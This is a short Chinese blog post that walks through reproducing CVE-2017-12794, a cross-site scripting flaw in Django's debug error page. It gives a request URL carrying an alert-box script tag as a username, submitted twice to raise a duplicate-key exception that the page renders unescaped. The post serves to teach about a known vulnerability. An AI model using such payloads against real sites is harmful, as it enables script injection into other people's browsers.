Django debug page XSS漏洞(CVE-2017-12794)(django是前端还是后端)

网友投稿 344 2022-10-08


Django debug page XSS漏洞(CVE-2017-12794)(django是前端还是后端)

1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>

显示用户已创建。2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>

3.触发异常:

duplicate key value violates unique constraint "xss_user_username_key" DETAIL: Key (username)=() already exists.

4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:从hihttps开源waf教你红黑树和哈希表的不同
下一篇:一篇文章带你深入了解Java类加载
相关文章

 发表评论

暂时没有评论,来抢沙发吧~